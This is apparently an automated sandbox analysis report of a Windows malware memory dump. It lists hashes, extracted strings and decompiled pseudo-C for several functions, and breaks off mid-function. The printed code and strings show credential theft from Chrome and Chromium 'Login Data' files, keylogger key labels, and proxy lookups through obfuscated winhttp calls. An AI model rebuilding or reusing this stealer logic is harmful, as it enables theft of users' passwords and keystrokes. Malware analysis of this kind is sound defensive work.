0x00405a92
0x00405a96
0x00405a9e
0x00405aa2
0x00405aac
0x00000000
0x00000000
0x00000000
0x00000000
0x00405aae
0x00405aae
0x00405ab9
0x00405abe
0x00405ac6
0x00000000
0x00000000
0x00405acc
0x00405ad2
0x00405ad8
0x00405b09
0x00405b0d
0x00405ada
0x00405ae0
0x00405ae4
0x00405ae4
0x00405ae8
0x00405aec
0x00405af6
0x00000000
0x00000000
0x00000000
0x00000000
0x00405af6
0x00000000
0x00405aae
0x00000000

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 257ab1642c2ba7176df9333284737b40def127f22e375dc60ae8d0ec264ec92a
Instruction ID: dc7f80c90ba20af356347f24dd4de35e54817c060e921352895bdcebc13e1e4f
Opcode Fuzzy Hash: 257ab1642c2ba7176df9333284737b40def127f22e375dc60ae8d0ec264ec92a
Instruction Fuzzy Hash: 7D71B7B0508B059FD710EF29D58465BBBE0FF84354F54893EE88897392D778A4468F4A

Uniqueness

Uniqueness Score: -1.00%

Function 004106BD, Relevance: .1, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004106BD(void* __eax, char _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v24;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v56;
				char _v60;
				intOrPtr _v64;
				signed int _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v80;
				intOrPtr _v84;
				signed int _v88;
				intOrPtr _v92;
				char _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				intOrPtr _v112;
				intOrPtr _v120;
				intOrPtr _v124;
				char* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				signed int _t44;
				signed int _t45;
				signed int _t49;
				char _t51;
				intOrPtr _t53;
				char _t54;
				signed int _t55;
				signed int _t56;
				intOrPtr _t57;
				char* _t58;
				void* _t59;
				void* _t61;
				signed int* _t62;

				_t54 = _a4;
				_t57 = _a8;
				_t56 =  &_v40;
				_v64 = 0x201;
				_v68 = 0;
				_v60 = _t56;
				_t53 = _a12;
				_v72 = _t57;
				_v76 = _t54; // executed
				L0041F42C(); // executed
				_t61 = _t59 - 0x28;
				if(__eax != 0) {
					_v96 = _t54;
					_v80 = _t56;
					_t55 = 0;
					_v84 = 0x101;
					_v88 = 0;
					_v92 = _t57;
					L0041F42C(); // executed
					_t62 = _t61 - 0x14;
					if(__eax == 0) {
						_t44 = _v80;
						_t58 =  &_v76;
						_v100 = 0;
						_v104 = 0;
						_v108 = 0;
						_v96 = _t58;
						_v112 = _t53;
						 *_t62 = _t44;
						L0041F424();
						_t62 = _t62 - 0x18;
						if(_t44 == 0 && _v100 < _v44) {
							goto L7;
						}
						goto L8;
					}
				} else {
					_t51 = _v60;
					_t58 =  &_v56;
					_v80 = 0;
					_v84 = 0;
					_v88 = 0;
					_t55 = 0;
					_v76 = _t58;
					_v92 = _t53;
					_v96 = _t51;
					L0041F424();
					_t62 = _t61 - 0x18;
					if(_t51 == 0 && _v24 > _v80) {
						L7:
						_v120 = _t58;
						_v132 = 0;
						_v136 = _t53;
						_v124 = _v48;
						_v128 =  &_v96;
						_t49 = _v104;
						 *_t62 = _t49;
						L0041F424();
						_t62 = _t62 - 0x18;
						_t55 = _t49 & 0xffffff00 | _t49 == 0x00000000;
					}
					L8:
					_t45 = _v104;
					 *_t62 = _t45;
					L0041F45C();
					_push(_t45);
				}
				return _t55;
			}

0x004106c4
0x004106c8
0x004106cc
0x004106d0
0x004106d8
0x004106e0
0x004106e4
0x004106e8
0x004106ec
0x004106ef
0x004106f4
0x004106f9
0x00410748
0x0041074b
0x0041074f
0x00410751
0x00410759
0x00410761
0x00410765
0x0041076a
0x0041076f
0x00410775
0x00410779
0x0041077d
0x00410785
0x0041078d
0x00410795
0x00410799
0x0041079d
0x004107a0
0x004107a5
0x004107aa
0x00000000
0x00000000
0x00000000
0x004107aa
0x004106fb
0x004106fb
0x004106ff
0x00410703
0x0041070b
0x00410713
0x0041071b
0x0041071d
0x00410721
0x00410725
0x00410728
0x0041072d
0x00410732
0x004107b6
0x004107ba
0x004107be
0x004107c6
0x004107ca
0x004107d2
0x004107d6
0x004107da
0x004107dd
0x004107e2
0x004107ea
0x004107ea
0x004107ec
0x004107ec
0x004107f0
0x004107f3
0x004107f8
0x004107f8
0x00410802

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e61b238f31f9a1af3280de932191ddadf40332958d4424c58cf9f30b9089abbc
Instruction ID: b9298c354bfd1ad9ab6003ea3d07812b51851590691558723ca7996c5ddaa5d6
Opcode Fuzzy Hash: e61b238f31f9a1af3280de932191ddadf40332958d4424c58cf9f30b9089abbc
Instruction Fuzzy Hash: 8331C3B55083059BD300AF6AC54435BFBE4BB84758F40892EF89897351D7B8EA898F86

Uniqueness

Uniqueness Score: -1.00%

Function 00405214, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d49987523794ce8ed4bb060c03339be3ab30899d0a78e50f53fa3c85019847e2
Instruction ID: 20f5eab9ee5944eb72183824eaa05ad15d37d7ba85e5585d89411a70b12a9a58
Opcode Fuzzy Hash: d49987523794ce8ed4bb060c03339be3ab30899d0a78e50f53fa3c85019847e2
Instruction Fuzzy Hash: 0221A7B1409741AED340EF59D18835BFFE0AF84748F80992EF89457251D3B999888F87

Uniqueness

Uniqueness Score: -1.00%

Function 00405EE7, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cc43028804df6e7031d7bdb477b00ee3d25e214831442e515feb843a0defbf8
Instruction ID: 3284ca1fbe294b016ba812f83614f168e55cc85ae0225a429d2d4095fe025a78
Opcode Fuzzy Hash: 2cc43028804df6e7031d7bdb477b00ee3d25e214831442e515feb843a0defbf8
Instruction Fuzzy Hash: 4B111CB05187419EE710AF25C54479BBBE8FF88308F00892EE89897281D77C85458F56

Uniqueness

Uniqueness Score: -1.00%

Function 00405CC4, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1cf67d523e38ab282052ba767e4d7ed1a34ce180a81d7b67339777580b685cf
Instruction ID: e4f2ceb084e057a26f4344f627522697bcbae48ed975df61c26fef9454d4b794
Opcode Fuzzy Hash: a1cf67d523e38ab282052ba767e4d7ed1a34ce180a81d7b67339777580b685cf
Instruction Fuzzy Hash: 26114CB05087059FE310AF26C54876BFBE8EFC4758F00892FE89897281D379D5498F96

Uniqueness

Uniqueness Score: -1.00%

Function 0041317C, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66d348306cd4d6e08c150d2591b3561f405742941a1a59f410c48e2ec4514cc5
Instruction ID: 2103f98854d31d6ee21eef8c691fbd4061408f6fabc572c20ce2be922a60f6fa
Opcode Fuzzy Hash: 66d348306cd4d6e08c150d2591b3561f405742941a1a59f410c48e2ec4514cc5
Instruction Fuzzy Hash: F00140B04083019AD310FF26D54535BFFE4AFC4758F008A1EE49887255D3788689CB87

Uniqueness

Uniqueness Score: -1.00%

Function 004051B5, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7b8c339338589e02d34dbb988770e9779c51bc79032b7918c0481683a5381f
Instruction ID: c7c63fa6584d291762938b61b036814656b365f8fb5761cd288c2352f27d1738
Opcode Fuzzy Hash: 2e7b8c339338589e02d34dbb988770e9779c51bc79032b7918c0481683a5381f
Instruction Fuzzy Hash: 6AF01DB45157109FC710EF29C48165BBBE0FF48314F06895DE8C89B316E238D880CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00405959, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 586562ab7f660d792621f7f3ff03a76942849b748750d6b5247e0080a37609ce
Instruction ID: 24ad92727fe000e7c60640d94de1f7f21ee868b5df478abe0a14dc0806b9406b
Opcode Fuzzy Hash: 586562ab7f660d792621f7f3ff03a76942849b748750d6b5247e0080a37609ce
Instruction Fuzzy Hash: A4D012F0504301AEE710BF51D4057BA7AE8AB41310F41483EA8D086242D77D448D4AA7

Uniqueness

Uniqueness Score: -1.00%

Function 00408AB3, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3194e90da334e6e38a89a9e3cd57681737c8a67fcd2182493c3a531e1f22581
Instruction ID: ad06f29d9f34d8de5c37fb948c6dfac14eb5c16bc83129ba4182c5028b8a9bce
Opcode Fuzzy Hash: c3194e90da334e6e38a89a9e3cd57681737c8a67fcd2182493c3a531e1f22581
Instruction Fuzzy Hash: FED05EB4504701AAD714FF2982453993EE05B40308F84843EDC88C3796E3BD81DD8B1B

Uniqueness

Uniqueness Score: -1.00%

Function 00407EF4, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3c58914c79796914ae3652b9338830a73e9f14980a586d20e581d2826090cc4
Instruction ID: d679871287b4664fab267dfb904784a560a8627629bc176350aa90e446a3ed10
Opcode Fuzzy Hash: e3c58914c79796914ae3652b9338830a73e9f14980a586d20e581d2826090cc4
Instruction Fuzzy Hash: D1B01274904B4047C700BF6C854245B7AE87A44304FC409ACF8C4D3303E13C82998A6B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00420420, Relevance: 5.2, Strings: 4, Instructions: 217COMMON

Download Yara Rule

Strings

n == 1, xrefs: 004206DF
n & 1, xrefs: 00420550
../nettle-3.5.1/memxor.c, xrefs: 00420548, 004206D7
o, xrefs: 004206CF

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: ../nettle-3.5.1/memxor.c$n & 1$n == 1$o
API String ID: 0-561580802
Opcode ID: c778598c57938beeda3a03c633ed9cdd53ae4a03349816565a6a334ef414175d
Instruction ID: 3ee2903d3d2c0e63440c59b9d95d43c21fe2c472ea4d5dc2fd0c85ac53de4ac0
Opcode Fuzzy Hash: c778598c57938beeda3a03c633ed9cdd53ae4a03349816565a6a334ef414175d
Instruction Fuzzy Hash: BB919E72A083628FC714CF29D48051AFBE2BFD8314F498A2EE8D59B355D735E945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0040F281, Relevance: 3.8, Strings: 3, Instructions: 37COMMON

Download Yara Rule

Strings

%s\Google\Chrome\User Data\Local State, xrefs: 0040F2C8
%s\Google\Chrome\User Data\Default\Login Data, xrefs: 0040F2A0
LOCALAPPDATA, xrefs: 0040F28D, 0040F2BC

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %s\Google\Chrome\User Data\Default\Login Data$%s\Google\Chrome\User Data\Local State$LOCALAPPDATA
API String ID: 0-1755387443
Opcode ID: 25c53191b8215658669394e1d36e76e7889413c500fa165d3e3269e3eeecf20e
Instruction ID: 71a4254163051be47397212b88bd25a6cdd91ad02d264920333697808a15e276
Opcode Fuzzy Hash: 25c53191b8215658669394e1d36e76e7889413c500fa165d3e3269e3eeecf20e
Instruction Fuzzy Hash: 8E0108F4408311AAC710BF62E44515EBBE0AF80398F51C83EE4D86B282C37C8599CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F382, Relevance: 3.8, Strings: 3, Instructions: 37COMMON

Download Yara Rule

Strings

%s\Chromium\User Data\Local State, xrefs: 0040F3C9
%s\Chromium\User Data\Default\Login Data, xrefs: 0040F3A1
LOCALAPPDATA, xrefs: 0040F38E, 0040F3BD

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %s\Chromium\User Data\Default\Login Data$%s\Chromium\User Data\Local State$LOCALAPPDATA
API String ID: 0-2609310803
Opcode ID: 21c6e6d024086da1ece91e8104a1bc99ea1c428e8fdbf93201ad434112c70fdf
Instruction ID: 1af54e81e90a1b2e64d1cb376851d72e513c3029c4754ec5bb28f3db25ee8883
Opcode Fuzzy Hash: 21c6e6d024086da1ece91e8104a1bc99ea1c428e8fdbf93201ad434112c70fdf
Instruction Fuzzy Hash: 8A011AB0408311AAC710BF22E44515EBFE0EF80358F51C83EE4D857282C77C8599CB4B

Uniqueness

Uniqueness Score: -1.00%

Function 00409953, Relevance: 30.2, Strings: 24, Instructions: 210COMMON

Download Yara Rule

Strings

[D00Wg aWgR], xrefs: 00409AAE
[cCYw6sCYd], xrefs: 004099DE
[qCV], xrefs: 00409A93
[adid5d], xrefs: 00409ADB
[9Cnd aWgR], xrefs: 00409AC0
[%s], xrefs: 00409CB4
[D00Wg r4nI5], xrefs: 00409AA5
[MY0Wii mWYw], xrefs: 00409A81
[XR6d05], xrefs: 00409AE4
@, xrefs: 00409B49
[j6Y], xrefs: 00409AF6
[Ctrl+%s], xrefs: 00409BD4
[9Cnd us], xrefs: 00409A0B
[P50i+%Y], xrefs: 00409C57
[904R5 MY0ddR], xrefs: 00409A64
@, xrefs: 00409C81
[PCs6 mWYw], xrefs: 00409AED
@, xrefs: 00409C12
[D00Wg md85], xrefs: 00409A9C
[jR5d0], xrefs: 00409A8A
[D00Wg us], xrefs: 00409A3F
[jRS], xrefs: 00409AC9
[c0dCw], xrefs: 00409AD2
[-Wld], xrefs: 00409AB7

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @$@$@$[%s]$[-Wld]$[904R5 MY0ddR]$[9Cnd aWgR]$[9Cnd us]$[Ctrl+%s]$[D00Wg aWgR]$[D00Wg md85]$[D00Wg r4nI5]$[D00Wg us]$[MY0Wii mWYw]$[P50i+%Y]$[PCs6 mWYw]$[XR6d05]$[adid5d]$[c0dCw]$[cCYw6sCYd]$[j6Y]$[jR5d0]$[jRS]$[qCV]
API String ID: 0-287945508
Opcode ID: a7201299a71ac298b4eb1a048ca88babafc008e2bbcecdb455fdf88870e38ce2
Instruction ID: 165817b8f912d8248abf4659c11c564849502453b133aa370f8f06421a69fc02
Opcode Fuzzy Hash: a7201299a71ac298b4eb1a048ca88babafc008e2bbcecdb455fdf88870e38ce2
Instruction Fuzzy Hash: 5D815AB0608351DAD720AF59D4C436FBAF4FB81304F51892FE4D566282C3BD49859F6B

Uniqueness

Uniqueness Score: -1.00%

Function 00408417, Relevance: 24.0, Strings: 19, Instructions: 294
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00408417(void* __edx, void* __eflags, char _a4, void* _a12, char _a20, char _a24, void _a36, intOrPtr _a40, intOrPtr _a56, char _a64, char _a65, char _a66, char _a67, char _a68, char _a69, void _a80, void _a88, void _a92, void* _a116, char _a136, char _a180, char _a200) {
				char _v0;
				void _v7;
				void* _v8;
				void* _v9;
				void* _v10;
				void* _v11;
				void* _v12;
				void* _v13;
				void* _v16;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				void* _v48;
				void* _v52;
				char _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				intOrPtr* _t121;
				char _t122;
				intOrPtr* _t123;
				intOrPtr* _t131;
				intOrPtr* _t138;
				intOrPtr _t150;
				int _t152;
				void* _t155;
				void* _t157;
				intOrPtr* _t169;
				intOrPtr* _t173;
				intOrPtr* _t185;
				intOrPtr* _t186;
				intOrPtr* _t187;
				char _t188;
				intOrPtr _t189;
				intOrPtr _t190;
				void* _t201;
				void* _t202;
				intOrPtr* _t221;
				intOrPtr* _t223;
				intOrPtr* _t224;
				intOrPtr* _t225;
				intOrPtr* _t229;
				intOrPtr* _t230;
				intOrPtr _t235;
				void* _t236;
				intOrPtr* _t237;
				intOrPtr* _t242;

				_t201 = __edx;
				_t237 = _t236 - E0041F3F0(0x110c);
				_t121 = E004081AA("U4R-55sTsdR");
				_v16 = "winhttp.dll";
				L0041F55C();
				_v16 = _t121;
				 *_t237 = _t121;
				L0041F5AC();
				_push(_t202);
				_t185 = _t121;
				_v28 = "U4R-55sEd590WfZ_W0u0i";
				_t122 = E004081AA(_t202);
				_v28 = "winhttp.dll";
				L0041F55C();
				_v28 = _t122;
				_v32 = _t122;
				L0041F5AC();
				_push(_t201);
				_push(_t201);
				if(_t185 != 0 && _t122 != 0) {
					memcpy( &_a80, L"InternetProxy", 7 << 2);
					_t191 = 0;
					_v24 = 0;
					_v28 = 0;
					_v32 = 0;
					_v36 = 1;
					_v40 =  &_a80;
					_a4 = 0;
					_t150 =  *_t185();
					_t237 = _t237 + 0xc - 0x14;
					_t189 = _t150;
					if(_t150 != 0) {
						_t201 =  &_a24;
						_t152 = memset( &_a36, _v16, 6 << 2);
						_a36 = 1;
						_a40 = 3;
						_a56 = 1;
						memset(_t201, _t152, 3 << 2);
						_t155 = memcpy( &_a88, L"http://www.yandex.com", 0xb << 2);
						_t242 = _t237 + 0x24;
						_t191 = 0;
						_v52 = _t155;
						_v48 = _t201;
						 *_t242 = _t189;
						_v56 =  &_a88;
						_t157 = _v0();
						_t237 = _t242 - 0x10;
						if(_t157 != 0) {
							memcpy( &_v7, "socks=", 7);
							_t237 = _t237 + 0xc;
							_t191 = 0;
							_v64 = _t190;
							_v68 = _t235;
							_v72 =  &_v7;
							 *_t237 =  &_a180;
							_t169 = E00408306(0, _t248);
							if(_t169 != 0) {
								 *_t237 = 0x8c;
								L0041F714();
								_t229 = _t169;
								_v68 = 0x40;
								_v72 = _t235;
								 *_t237 = _t169 + 4;
								E00412548();
								 *_t229 = 0;
								 *_t237 = _t190;
								 *((intOrPtr*)(_t229 + 0x44)) = E00412666(0);
								_t173 =  *0x42b304;
								 *0x42b304 = _t229;
								 *((intOrPtr*)(_t229 + 0x88)) = _t173;
								 *_t237 = 0x8c;
								L0041F714();
								_t230 = _t173;
								_v68 = 0x40;
								_v72 = _t235;
								 *_t237 = _t173 + 4;
								E00412548();
								 *_t230 = 2;
								 *_t237 = _t190;
								 *((intOrPtr*)(_t230 + 0x44)) = E00412666(0);
								 *0x42b304 = _t230;
								 *((intOrPtr*)(_t230 + 0x88)) =  *0x42b304;
								_v68 = 4;
								_v72 = 0x422fa5;
								 *_t237 = 0x4223dc;
								E00412548();
							}
						}
					}
				}
				_t123 = E004081AA("U4R-55sEd5Xj90WfZPWR84n_W0PQ00dR5u6d0");
				_v40 = "winhttp.dll";
				_t186 = _t123;
				L0041F55C();
				_push(_t191);
				_v40 = _t186;
				_v44 = _t123;
				L0041F5AC();
				_push(_t186);
				_t221 = _t123;
				_push(_t186);
				if(_t123 != 0) {
					_v52 = 0x10;
					L0041F714();
					_t187 = _t123;
					_v52 = _t123;
					_t123 =  *_t221();
					_t251 = _t123;
					_push(_t201);
					if(_t123 != 0) {
						_v48 = "%S";
						_t188 =  &_a20;
						_v52 = 0x1000;
						_t233 =  &_a136;
						_v44 =  *((intOrPtr*)(_t187 + 8));
						_v56 =  &_a200;
						E004127A8();
						E00412588( &_a200, 0x422f70, 0x1000);
						_v44 = _t188;
						_v48 =  &_a136;
						_a64 = 0x68;
						_a65 = 0x74;
						_v52 =  &_a64;
						_a66 = 0x74;
						_a67 = 0x70;
						_a68 = 0x3d;
						_v56 =  &_a200;
						_a69 = 0;
						_t131 = E00408306(_t191, _t251);
						_t252 = _t131;
						if(_t131 != 0) {
							_v56 = 0x8c;
							L0041F714();
							_t225 = _t131;
							E00412548(_t131 + 4, _t233, 0x40);
							 *_t225 = 3;
							_v56 = _t188;
							 *((intOrPtr*)(_t225 + 0x44)) = E00412666(_t191);
							 *0x42b304 = _t225;
							 *((intOrPtr*)(_t225 + 0x88)) =  *0x42b304;
							E00412548(0x4223dc, 0x422fa5, 4);
						}
						memcpy( &_a92, "socks=", 7);
						_t237 = _t237 + 0xc;
						_t123 = E00408306(0, _t252,  &_a200,  &_a92, _t233, _t188);
						if(_t123 != 0) {
							_v56 = 0x8c;
							L0041F714();
							_t223 = _t123;
							E00412548(_t123 + 4, _t233, 0x40);
							 *_t223 = 2;
							_v56 = _t188;
							 *((intOrPtr*)(_t223 + 0x44)) = E00412666(0);
							_t138 =  *0x42b304;
							 *0x42b304 = _t223;
							 *((intOrPtr*)(_t223 + 0x88)) = _t138;
							_v56 = 0x8c;
							L0041F714();
							_t224 = _t138;
							E00412548(_t138 + 4, _t233, 0x40);
							 *_t224 = 0;
							_v56 = _t188;
							 *((intOrPtr*)(_t224 + 0x44)) = E00412666(0);
							 *0x42b304 = _t224;
							 *((intOrPtr*)(_t224 + 0x88)) =  *0x42b304;
							_t123 = E00412548(0x4223dc, 0x422fa5, 4);
						}
					}
				}
				return _t123;
			}

0x00408417
0x00408425
0x0040842e
0x00408433
0x0040843c
0x00408442
0x00408446
0x00408449
0x0040844e
0x00408450
0x00408452
0x00408459
0x0040845e
0x00408467
0x0040846d
0x00408471
0x00408474
0x0040847b
0x0040847c
0x0040847d
0x0040849b
0x0040849b
0x004084a1
0x004084a9
0x004084b1
0x004084b9
0x004084c1
0x004084c4
0x004084c8
0x004084ca
0x004084cf
0x004084d1
0x004084db
0x004084ed
0x004084f6
0x004084fe
0x00408506
0x0040850e
0x00408520
0x00408520
0x00408520
0x00408522
0x0040852d
0x00408531
0x00408534
0x00408538
0x0040853a
0x0040853f
0x00408648
0x00408648
0x00408648
0x0040864e
0x00408652
0x00408656
0x00408661
0x00408664
0x0040866b
0x00408671
0x00408678
0x0040867d
0x00408682
0x0040868a
0x0040868e
0x00408691
0x00408696
0x0040869c
0x004086a4
0x004086a7
0x004086ac
0x004086b2
0x004086b8
0x004086bf
0x004086c4
0x004086c9
0x004086d1
0x004086d5
0x004086d8
0x004086dd
0x004086e3
0x004086eb
0x004086f3
0x004086f9
0x004086ff
0x00408707
0x0040870f
0x00408716
0x00408716
0x0040866b
0x0040853f
0x004084d1
0x00408722
0x00408727
0x0040872e
0x00408730
0x00408735
0x00408736
0x0040873a
0x0040873d
0x00408744
0x00408745
0x00408747
0x00408748
0x0040874e
0x00408755
0x0040875a
0x0040875c
0x0040875f
0x00408761
0x00408763
0x00408764
0x0040876d
0x00408775
0x00408779
0x00408781
0x00408788
0x00408793
0x00408796
0x004087b5
0x004087be
0x004087c2
0x004087c6
0x004087cb
0x004087d0
0x004087db
0x004087e0
0x004087e5
0x004087ea
0x004087ed
0x004087f2
0x004087f7
0x004087f9
0x004087fb
0x00408802
0x00408807
0x0040881b
0x00408820
0x00408826
0x0040882e
0x00408836
0x0040883c
0x00408859
0x00408859
0x0040886f
0x0040886f
0x0040888e
0x00408895
0x0040889b
0x004088a2
0x004088a7
0x004088bb
0x004088c0
0x004088c6
0x004088ce
0x004088d1
0x004088d6
0x004088dc
0x004088e2
0x004088e9
0x004088ee
0x00408902
0x00408907
0x0040890d
0x00408915
0x0040891d
0x00408923
0x00408940
0x00408940
0x00408895
0x00408764
0x0040894f

Strings

U4R-55sEd5Xj90WfZPWR84n_W0PQ00dR5u6d0, xrefs: 0040871B
p, xrefs: 004085BC
InternetProxy, xrefs: 00408491
=, xrefs: 004087E5
001, xrefs: 0040862E, 0040870F, 00408852, 00408939
U4R-55sTsdR, xrefs: 00408427
U4R-55sEd590WfZ_W0u0i, xrefs: 00408452
http://www.yandex.com, xrefs: 004084E8
h, xrefs: 004087C6
t, xrefs: 004087DB
=, xrefs: 004085C1
h, xrefs: 004085A2
t, xrefs: 004085B7
winhttp.dll, xrefs: 00408433, 0040845E, 00408727
t, xrefs: 004087CB
p, xrefs: 004087E0
t, xrefs: 004085A7
@, xrefs: 004088F3
socks=, xrefs: 0040863E, 00408865

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 001$=$=$@$InternetProxy$U4R-55sEd590WfZ_W0u0i$U4R-55sEd5Xj90WfZPWR84n_W0PQ00dR5u6d0$U4R-55sTsdR$h$h$http://www.yandex.com$p$p$socks=$t$t$t$t$winhttp.dll
API String ID: 0-337019666
Opcode ID: 5ae4fd168ad160b687ec016b66311f032f2127d997e6a72b6d5e7ab802d206c0
Instruction ID: 129794d27e18b5d836c16bc2de0120feea3297db44a07732c008f05b0d4f5d07
Opcode Fuzzy Hash: 5ae4fd168ad160b687ec016b66311f032f2127d997e6a72b6d5e7ab802d206c0
Instruction Fuzzy Hash: 09D1F5B0508740AFD710EF25C68479ABBF0BF84744F418C2EE5C897351EBB99989CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC15, Relevance: 15.2, Strings: 12, Instructions: 218COMMON

Download Yara Rule

Strings

I, xrefs: 0041AEAC
R, xrefs: 0041AE3C
G, xrefs: 0041ADFD
), xrefs: 0041ACB5
A, xrefs: 0041AEC3
T, xrefs: 0041AED0
P, xrefs: 0041ADD0
N, xrefs: 0041ADF4
H, xrefs: 0041AE32
D, xrefs: 0041AEBE
I, xrefs: 0041AE2D
D, xrefs: 0041AE37

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: )$A$D$D$G$H$I$I$N$P$R$T
API String ID: 0-4026286603
Opcode ID: f7e0d66e6706360943002546ce2ae5a522dee07f1adf161bc0e3ce1e523a7a0e
Instruction ID: 7b50295ee95f3483ab7dff93a2a89c17451d79e52031df4d4eaf42e24e8d509c
Opcode Fuzzy Hash: f7e0d66e6706360943002546ce2ae5a522dee07f1adf161bc0e3ce1e523a7a0e
Instruction Fuzzy Hash: 14A1D27110D3809ED311DB69C48438FFFE1ABA6308F44895EE5C89B382D7B99989CB57

Uniqueness

Uniqueness Score: -1.00%

Function 0040262F, Relevance: 11.5, Strings: 9, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E0040262F(signed int __ecx, signed int __edx, intOrPtr _a4) {
				char _v608;
				char _v624;
				char _v868;
				char _v876;
				char _v916;
				intOrPtr _v936;
				signed short _v944;
				signed short _v948;
				intOrPtr _v964;
				intOrPtr _v968;
				signed short _v972;
				intOrPtr _v976;
				signed short _v980;
				char _v988;
				signed short _v996;
				signed short _v1000;
				signed short _v1004;
				signed short _v1008;
				signed int _v1010;
				signed short _v1012;
				signed short _v1014;
				intOrPtr _v1016;
				signed int _v1018;
				char* _v1020;
				signed short _v1022;
				signed short _v1024;
				signed short _v1028;
				signed short _v1032;
				signed short _v1036;
				signed int _v1040;
				signed int _v1048;
				signed short _v1052;
				signed short _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				char _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				intOrPtr _t139;
				intOrPtr _t140;
				intOrPtr _t141;
				intOrPtr* _t144;
				signed short _t147;
				void* _t150;
				void* _t162;
				void* _t163;
				signed short _t164;
				void* _t165;
				signed short _t168;
				void* _t169;
				signed int _t170;
				signed int _t179;
				signed short _t182;
				void* _t183;
				signed short _t186;
				void* _t187;
				signed int _t188;
				void* _t192;
				signed int _t193;
				signed int _t206;
				intOrPtr* _t211;
				signed int _t213;
				signed int _t214;
				signed int _t216;
				signed int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t223;
				signed int _t231;
				signed short* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				signed short* _t237;
				signed short* _t238;
				void* _t239;
				signed int* _t240;

				_t223 = __edx;
				_t220 = __ecx;
				_t237 =  &_v1004;
				E0041236C( &_v944,  &_v944, 0x8000);
				_t139 = E00407F7A(_t223, "iphlpapi.dll");
				_v1020 = "psapi.dll";
				_v976 = _t139;
				_t140 = E00407F7A(_t223);
				_v1020 = "kernel32.dll";
				_v968 = _t140;
				_t141 = E00407F7A(_t223);
				_v1020 = "Ed5jf5dRSdSqYsqCVid";
				_v964 = _t141;
				_t144 = E00407F8E(_t223, _v976, E004081AA());
				_v1020 = "Ed5jf5dRSdSuSsqCVid";
				_t211 = _t144;
				_t147 = E00407F8E(_t223, _v976, E004081AA());
				_v1020 = "Ed590WYd66XlCnd_4idLCldD";
				_v972 = _t147;
				_t150 = E00407F8E(_t223, _v968, E004081AA());
